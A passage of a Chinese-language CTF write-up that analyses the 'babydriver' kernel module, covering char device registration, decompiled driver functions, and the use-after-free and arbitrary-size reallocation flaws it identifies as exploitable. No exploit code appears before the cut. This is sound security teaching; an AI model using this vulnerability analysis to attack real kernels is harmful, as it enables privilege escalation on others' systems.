@cdev: the structure to initialize</span></span><br><span class="line"><span class="comment"> * @fops: the file_operations for this device</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Initializes @cdev, remembering @fops, making it ready to add to the</span></span><br><span class="line"><span class="comment"> * system with cdev_add().</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">cdev_init</span><span class="params">(<span class="keyword">struct</span> cdev *cdev, <span class="type">const</span> <span class="keyword">struct</span> file_operations *fops)</span></span></span><br></pre></td></tr></table></figure><p>正如注释中写到，传入的 cdev 指针所对应的 <code>struct cdev</code> 将会被初始化，同时<strong>设置该设备的各类操作</strong>为传入的 <code>file_operations</code>结构体指针。</p><p><code>file_operations</code>结构体中包含了大量的函数指针：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">file_operations</span> &#123;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">module</span> *owner;</span><br><span class="line">  <span class="built_in">loff_t</span> (*llseek) (<span class="keyword">struct</span> file *, <span class="type">loff_t</span>, <span class="type">int</span>);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*read) (<span class="keyword">struct</span> file *, <span class="type">char</span> __user *, <span class="type">size_t</span>, <span class="type">loff_t</span> *);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*write) (<span class="keyword">struct</span> file *, <span class="type">const</span> <span class="type">char</span> __user *, <span class="type">size_t</span>, <span class="type">loff_t</span> *);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*read_iter) (<span class="keyword">struct</span> kiocb *, <span class="keyword">struct</span> iov_iter *);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*write_iter) (<span class="keyword">struct</span> kiocb *, <span class="keyword">struct</span> iov_iter *);</span><br><span class="line">  <span class="built_in">int</span> (*iopoll)(<span class="keyword">struct</span> kiocb *kiocb, <span class="type">bool</span> spin);</span><br><span class="line">  <span class="built_in">int</span> (*iterate) (<span class="keyword">struct</span> file *, <span class="keyword">struct</span> dir_context *);</span><br><span class="line">  <span class="built_in">int</span> (*iterate_shared) (<span class="keyword">struct</span> file *, <span class="keyword">struct</span> dir_context *);</span><br><span class="line">  <span class="type">__poll_t</span> (*poll) (<span class="keyword">struct</span> file *, <span class="keyword">struct</span> poll_table_struct *);</span><br><span class="line">  <span class="built_in">long</span> (*unlocked_ioctl) (<span class="keyword">struct</span> file *, <span class="type">unsigned</span> <span class="type">int</span>, <span class="type">unsigned</span> <span class="type">long</span>);</span><br><span class="line">  <span class="built_in">long</span> (*compat_ioctl) (<span class="keyword">struct</span> file *, <span class="type">unsigned</span> <span class="type">int</span>, <span class="type">unsigned</span> <span class="type">long</span>);</span><br><span class="line">  <span class="built_in">int</span> (*mmap) (<span class="keyword">struct</span> file *, <span class="keyword">struct</span> vm_area_struct *);</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> mmap_supported_flags;</span><br><span class="line">  <span class="built_in">int</span> (*open) (<span class="keyword">struct</span> inode *, <span class="keyword">struct</span> file *);</span><br><span class="line">  <span class="built_in">int</span> (*flush) (<span class="keyword">struct</span> file *, <span class="type">fl_owner_t</span> id);</span><br><span class="line">  <span class="built_in">int</span> (*release) (<span class="keyword">struct</span> inode *, <span class="keyword">struct</span> file *);</span><br><span class="line">  <span class="built_in">int</span> (*fsync) (<span class="keyword">struct</span> file *, <span class="type">loff_t</span>, <span class="type">loff_t</span>, <span class="type">int</span> datasync);</span><br><span class="line">  <span class="built_in">int</span> (*fasync) (<span class="type">int</span>, <span class="keyword">struct</span> file *, <span class="type">int</span>);</span><br><span class="line">  <span class="built_in">int</span> (*lock) (<span class="keyword">struct</span> file *, <span class="type">int</span>, <span class="keyword">struct</span> file_lock *);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*sendpage) (<span class="keyword">struct</span> file *, <span class="keyword">struct</span> page *, <span class="type">int</span>, <span class="type">size_t</span>, <span class="type">loff_t</span> *, <span class="type">int</span>);</span><br><span class="line">  <span class="function"><span class="type">unsigned</span> <span class="title">long</span> <span class="params">(*get_unmapped_area)</span><span class="params">(<span class="keyword">struct</span> file *, <span class="type">unsigned</span> <span class="type">long</span>, <span class="type">unsigned</span> <span class="type">long</span>, <span class="type">unsigned</span> <span class="type">long</span>, <span class="type">unsigned</span> <span class="type">long</span>)</span></span>;</span><br><span class="line">  <span class="built_in">int</span> (*check_flags)(<span class="type">int</span>);</span><br><span class="line">  <span class="built_in">int</span> (*flock) (<span class="keyword">struct</span> file *, <span class="type">int</span>, <span class="keyword">struct</span> file_lock *);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*splice_write)(<span class="keyword">struct</span> pipe_inode_info *, <span class="keyword">struct</span> file *, <span class="type">loff_t</span> *, <span class="type">size_t</span>, <span class="type">unsigned</span> <span class="type">int</span>);</span><br><span class="line">  <span class="built_in">ssize_t</span> (*splice_read)(<span class="keyword">struct</span> file *, <span class="type">loff_t</span> *, <span class="keyword">struct</span> pipe_inode_info *, <span class="type">size_t</span>, <span class="type">unsigned</span> <span class="type">int</span>);</span><br><span class="line">  <span class="built_in">int</span> (*setlease)(<span class="keyword">struct</span> file *, <span class="type">long</span>, <span class="keyword">struct</span> file_lock **, <span class="type">void</span> **);</span><br><span class="line">  <span class="built_in">long</span> (*fallocate)(<span class="keyword">struct</span> file *file, <span class="type">int</span> mode, <span class="type">loff_t</span> offset,</span><br><span class="line">        <span class="type">loff_t</span> len);</span><br><span class="line">  <span class="built_in">void</span> (*show_fdinfo)(<span class="keyword">struct</span> seq_file *m, <span class="keyword">struct</span> file *f);</span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> CONFIG_MMU</span></span><br><span class="line">  <span class="built_in">unsigned</span> (*mmap_capabilities)(<span class="keyword">struct</span> file *);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="built_in">ssize_t</span> (*copy_file_range)(<span class="keyword">struct</span> file *, <span class="type">loff_t</span>, <span class="keyword">struct</span> file *,</span><br><span class="line">      <span class="type">loff_t</span>, <span class="type">size_t</span>, <span class="type">unsigned</span> <span class="type">int</span>);</span><br><span class="line">  <span class="built_in">loff_t</span> (*remap_file_range)(<span class="keyword">struct</span> file *file_in, <span class="type">loff_t</span> pos_in,</span><br><span class="line">           <span class="keyword">struct</span> file *file_out, <span class="type">loff_t</span> pos_out,</span><br><span class="line">           <span class="type">loff_t</span> len, <span class="type">unsigned</span> <span class="type">int</span> remap_flags);</span><br><span class="line">  <span class="built_in">int</span> (*fadvise)(<span class="keyword">struct</span> file *, <span class="type">loff_t</span>, <span class="type">loff_t</span>, <span class="type">int</span>);</span><br><span class="line">&#125; __randomize_layout;</span><br></pre></td></tr></table></figure><p>但在这道题中我们只会用到其中的一小部分，即 <code>/baby(open|release|read|write|ioctl)/</code>。</p><blockquote><p>struct file_operations 中的 owner 指针是必须指向当前内核模块的指针，可以使用宏定义 <code>THIS_MODULE</code> 来获取该指针。</p></blockquote><p>当 cdev 结构体初始化完成后，最后的一步就是使用 <code>cdev_add</code> 告诉内核该设备的设备号。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cdev_add</span>(&amp;cdev_0, babydev_no, <span class="number">1</span>);</span><br></pre></td></tr></table></figure><p>其中，<code>cdev_add</code> 函数声明如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * cdev_add() - add a char device to the system</span></span><br><span class="line"><span class="comment"> * @p: the cdev structure for the device</span></span><br><span class="line"><span class="comment"> * @dev: the first device number for which this device is responsible</span></span><br><span class="line"><span class="comment"> * @count: the number of consecutive minor numbers corresponding to this</span></span><br><span class="line"><span class="comment"> *         device</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * cdev_add() adds the device represented by @p to the system, making it</span></span><br><span class="line"><span class="comment"> * live immediately.  A negative error code is returned on failure.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">cdev_add</span><span class="params">(<span class="keyword">struct</span> cdev *p, <span class="type">dev_t</span> dev, <span class="type">unsigned</span> count)</span></span></span><br></pre></td></tr></table></figure><p>需要注意的是，一旦 <code>cdev_add</code> 函数执行完成，则当前 cdev 设备<strong>立即处于活动状态</strong>，其<strong>操作可以立即被内核调用</strong>。因此在编写驱动程序时，务必保证在驱动程序完全准备好处理设备上的操作之后，最后再来调用 <code>cdev_add</code>。</p><h6 id="1-4-将设备注册进-sysfs">1.4) 将设备注册进 sysfs</h6><p>当驱动模块已经将 cdev 注册进内核后，该函数将会执行以下代码，来将当前设备的设备结点注册进  sysfs 中。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">babydev_class = <span class="built_in">class_create</span>(THIS_MODULE, <span class="string">&quot;babydev&quot;</span>);</span><br><span class="line"><span class="built_in">device_create</span>(babydev_class, <span class="number">0</span>, babydev_no, <span class="number">0</span>, <span class="string">&quot;babydev&quot;</span>);</span><br></pre></td></tr></table></figure><p>其中，函数 <code>class_create</code> 和 <code>device_create</code> 的声明如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* This is a #define to keep the compiler from merging different</span></span><br><span class="line"><span class="comment"> * instances of the __key variable */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> class_create(owner, name)    \</span></span><br><span class="line"><span class="meta">(&#123;            \</span></span><br><span class="line"><span class="meta">  static struct lock_class_key __key;  \</span></span><br><span class="line"><span class="meta">  __class_create(owner, name, &amp;__key);  \</span></span><br><span class="line"><span class="meta">&#125;)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * class_create - create a struct class structure</span></span><br><span class="line"><span class="comment"> * @owner: pointer to the module that is to &quot;own&quot; this struct class</span></span><br><span class="line"><span class="comment"> * @name: pointer to a string for the name of this class.</span></span><br><span class="line"><span class="comment"> * @key: the lock_class_key for this class; used by mutex lock debugging</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * This is used to create a struct class pointer that can then be used</span></span><br><span class="line"><span class="comment"> * in calls to device_create().</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Returns &amp;struct class pointer on success, or ERR_PTR() on error.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Note, the pointer created here is to be destroyed when finished by</span></span><br><span class="line"><span class="comment"> * making a call to class_destroy().</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">class</span> *__class_create(<span class="keyword">struct</span> <span class="keyword">module</span> *owner, <span class="type">const</span> <span class="type">char</span> *name,</span><br><span class="line">           <span class="keyword">struct</span> lock_class_key *key)</span><br><span class="line">    </span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * device_create - creates a device and registers it with sysfs</span></span><br><span class="line"><span class="comment"> * @class: pointer to the struct class that this device should be registered to</span></span><br><span class="line"><span class="comment"> * @parent: pointer to the parent struct device of this new device, if any</span></span><br><span class="line"><span class="comment"> * @devt: the dev_t for the char device to be added</span></span><br><span class="line"><span class="comment"> * @drvdata: the data to be added to the device for callbacks</span></span><br><span class="line"><span class="comment"> * @fmt: string for the device&#x27;s name</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * This function can be used by char device classes.  A struct device</span></span><br><span class="line"><span class="comment"> * will be created in sysfs, registered to the specified class.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * A &quot;dev&quot; file will be created, showing the dev_t for the device, if</span></span><br><span class="line"><span class="comment"> * the dev_t is not 0,0.</span></span><br><span class="line"><span class="comment"> * If a pointer to a parent struct device is passed in, the newly created</span></span><br><span class="line"><span class="comment"> * struct device will be a child of that device in sysfs.</span></span><br><span class="line"><span class="comment"> * The pointer to the struct device will be returned from the call.</span></span><br><span class="line"><span class="comment"> * Any further sysfs files that might be required can be created using this</span></span><br><span class="line"><span class="comment"> * pointer.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Returns &amp;struct device pointer on success, or ERR_PTR() on error.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Note: the struct class passed to this function must have previously</span></span><br><span class="line"><span class="comment"> * been created with a call to class_create().</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">device</span> *<span class="built_in">device_create</span>(<span class="keyword">struct</span> <span class="keyword">class</span> *<span class="keyword">class</span>, <span class="keyword">struct</span> device *parent,</span><br><span class="line">           <span class="type">dev_t</span> devt, <span class="type">void</span> *drvdata, <span class="type">const</span> <span class="type">char</span> *fmt, ...)</span><br></pre></td></tr></table></figure><p>初始时，init 函数通过调用 <code>class_create</code> 函数创建一个 <code>class</code> 类型的<strong>类</strong>，创建好后的<strong>类</strong>存放于sysfs下面，可以在 <code>/sys/class</code>中找到。</p><p>之后函数调用 <code>device_create</code> 函数，动态建立<strong>逻辑设备</strong>，对新逻辑设备进行初始化；同时还将其与第一个参数所对应的<strong>逻辑类</strong>相关联，并将此逻辑设备加到linux内核系统的设备驱动程序模型中。这样，函数会自动在 <code>/sys/devices/virtual</code> 目录下创建新的逻辑设备目录，并在 <code>/dev</code> 目录下创建与<strong>逻辑类</strong>对应的设备文件。</p><p>最终实现效果就是，我们便可以在 <code>/dev</code> 中看到该设备。</p><h6 id="1-5-init-函数小结">1.5 init 函数小结</h6><p>综上，<code>babydriver_init</code> 函数主要做了几件事：</p><ol><li>向内核申请一个空闲的设备号</li><li>声明一个 cdev 结构体，初始化并绑定设备号</li><li>创建新的 struct class，并将该设备号所对应的设备注册进 sysfs</li></ol><h5 id="2-babydriver-exit">2) babydriver_exit</h5><p>理解完 init 函数后，理解 exit 函数的逻辑就相当的简单——把该释放的数据结构全部释放。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> __cdecl <span class="title">babydriver_exit</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="built_in">device_destroy</span>(babydev_class, babydev_no);</span><br><span class="line">  <span class="built_in">class_destroy</span>(babydev_class);</span><br><span class="line">  <span class="built_in">cdev_del</span>(&amp;cdev_0);</span><br><span class="line">  <span class="built_in">unregister_chrdev_region</span>(babydev_no, <span class="number">1LL</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="3-babyopen">3) babyopen</h5><p>该函数代码如下：</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211004201828178.png" alt="image-20211004201828178"></p><p>babyopen 函数在内核中创建了一个 <code>babydev_struct</code> 的结构体，其中包含了一个 <code>device_buf</code> 指针以及一个 <code>device_buf_len</code>成员变量。</p><p>需要注意的是，<code>kmem_cache_alloc_trace</code> 函数分配内存的逻辑与 <code>kmalloc</code>类似，笔者怀疑反汇编出来的代码应该是调用 <code>kmalloc</code> 函数优化内敛后的效果：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * kmalloc - allocate memory</span></span><br><span class="line"><span class="comment"> * @size: how many bytes of memory are required.</span></span><br><span class="line"><span class="comment"> * @flags: the type of memory to allocate.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * kmalloc is the normal method of allocating memory</span></span><br><span class="line"><span class="comment"> * for objects smaller than page size in the kernel.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The allocated object address is aligned to at least ARCH_KMALLOC_MINALIGN</span></span><br><span class="line"><span class="comment"> * bytes. For @size of power of two bytes, the alignment is also guaranteed</span></span><br><span class="line"><span class="comment"> * to be at least to the size.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The @flags argument may be one of the GFP flags defined at</span></span><br><span class="line"><span class="comment"> * include/linux/gfp.h and described at</span></span><br><span class="line"><span class="comment"> * :ref:`Documentation/core-api/mm-api.rst &lt;mm-api-gfp-flags&gt;`</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The recommended usage of the @flags is described at</span></span><br><span class="line"><span class="comment"> * :ref:`Documentation/core-api/memory-allocation.rst &lt;memory_allocation&gt;`</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Below is a brief outline of the most useful GFP flags</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %GFP_KERNEL</span></span><br><span class="line"><span class="comment"> *  Allocate normal kernel ram. May sleep.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %GFP_NOWAIT</span></span><br><span class="line"><span class="comment"> *  Allocation will not sleep.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %GFP_ATOMIC</span></span><br><span class="line"><span class="comment"> *  Allocation will not sleep.  May use emergency pools.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %GFP_HIGHUSER</span></span><br><span class="line"><span class="comment"> *  Allocate memory from high memory on behalf of user.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Also it is possible to set different flags by OR&#x27;ing</span></span><br><span class="line"><span class="comment"> * in one or more of the following additional @flags:</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %__GFP_HIGH</span></span><br><span class="line"><span class="comment"> *  This allocation has high priority and may use emergency pools.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %__GFP_NOFAIL</span></span><br><span class="line"><span class="comment"> *  Indicate that this allocation is in no way allowed to fail</span></span><br><span class="line"><span class="comment"> *  (think twice before using).</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %__GFP_NORETRY</span></span><br><span class="line"><span class="comment"> *  If memory is not immediately available,</span></span><br><span class="line"><span class="comment"> *  then give up at once.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %__GFP_NOWARN</span></span><br><span class="line"><span class="comment"> *  If allocation fails, don&#x27;t issue any warnings.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * %__GFP_RETRY_MAYFAIL</span></span><br><span class="line"><span class="comment"> *  Try really hard to succeed the allocation but fail</span></span><br><span class="line"><span class="comment"> *  eventually.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> __always_inline <span class="type">void</span> *<span class="title">kmalloc</span><span class="params">(<span class="type">size_t</span> size, <span class="type">gfp_t</span> flags)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (__builtin_constant_p(size)) &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> CONFIG_SLOB</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> index;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    <span class="keyword">if</span> (size &gt; KMALLOC_MAX_CACHE_SIZE)</span><br><span class="line">      <span class="keyword">return</span> <span class="built_in">kmalloc_large</span>(size, flags);</span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> CONFIG_SLOB</span></span><br><span class="line">    index = <span class="built_in">kmalloc_index</span>(size);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!index)</span><br><span class="line">      <span class="keyword">return</span> ZERO_SIZE_PTR;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">kmem_cache_alloc_trace</span>(</span><br><span class="line">        kmalloc_caches[<span class="built_in">kmalloc_type</span>(flags)][index],</span><br><span class="line">        flags, size);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __kmalloc(size, flags);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="4-babyrelease">4) babyrelease</h5><p>babyrelease 函数的逻辑较为简单，这里只是简单的将 babydev_struct.device_buf 释放掉。</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211004202526936.png" alt="image-20211004202526936"></p><p>但这里需要注意的是，尽管这里释放了指针所指向的内核空间，但 <strong>在释放完成后，该函数既没有对<code>device_buf</code>指针置空，也没有设置 <code>device_buf_len</code> 为0</strong> 。</p><h5 id="5-babyread">5) babyread</h5><p>babyread 函数的 IDA 反汇编效果存在错误，这是笔者根据汇编代码修正后的效果：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">ssize_t</span> __fastcall <span class="title">babyread</span><span class="params">(file *filp, <span class="type">char</span> *buffer, <span class="type">size_t</span> length, <span class="type">loff_t</span> *offset)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  _fentry__(filp, buffer);</span><br><span class="line">  <span class="keyword">if</span> ( !babydev_struct.device_buf )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1LL</span>;</span><br><span class="line">  result = <span class="number">-2LL</span>;</span><br><span class="line">  <span class="keyword">if</span> ( babydev_struct.device_buf_len &gt; length )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">copy_to_user</span>(buffer, babydev_struct.device_buf, length);</span><br><span class="line">    result = length;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>babyread 函数将在判断完当前 device_buf 是否为空之后，将 device_buf 上的内存拷贝至用户空间的 buffer 内存。</p><h5 id="6-babywrite">6) babywrite</h5><p>babywrite 功能与 babyread 类似，将用户空间的 buffer 内存上的数据拷贝进内核空间的 device_buf 上，此处不再赘述。该函数修正后的反编译代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">ssize_t</span> __fastcall <span class="title">babywrite</span><span class="params">(file *filp, <span class="type">const</span> <span class="type">char</span> *buffer, <span class="type">size_t</span> length, <span class="type">loff_t</span> *offset)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  _fentry__(filp, buffer);</span><br><span class="line">  <span class="keyword">if</span> ( !babydev_struct.device_buf )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1LL</span>;</span><br><span class="line">  result = <span class="number">-2LL</span>;</span><br><span class="line">  <span class="keyword">if</span> ( babydev_struct.device_buf_len &gt; length )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">copy_from_user</span>(babydev_struct.device_buf, buffer, length);</span><br><span class="line">    result = length;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="7-babyioctl">7) babyioctl</h5><p>babyioctl 函数的功能类似于 <code>realloc</code>：将原先的 device_buf 释放，并分配一块新的内存。</p><p>但这里有个很重要的点需要注意：<strong>该位置的 kmalloc 大小可以被用户任意指定</strong>，而不是先前 babyopen 中的 64。</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211004203631020.png" alt="image-20211004203631020"></p><h4 id="e-获取到的信息">e. 获取到的信息</h4><p>根据上面的分析，最终我们可以得到以下信息：</p><p>已开启的保护：</p><ul><li><p>nx</p></li><li><p>smep</p></li></ul><p>内核模块中可能能利用的点：</p><ul><li>babyrelease <strong>释放 device_buf 指针后没有置空，device_buf_len 没有重置为0</strong></li><li>babyioctl 可以让 device_buf  重新分配<strong>任意大小</strong>的内存</li><li>当前内核模块中<strong>所有用到的变量都是全局变量</strong>，这意味着<strong>并发性非常的脆弱</strong>，或许可以利用一下。</li></ul><h3 id="4-调试前的准备">4. 调试前的准备</h3><ul><li><p>编写以下 shell 脚本以快速启动调试会话</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span 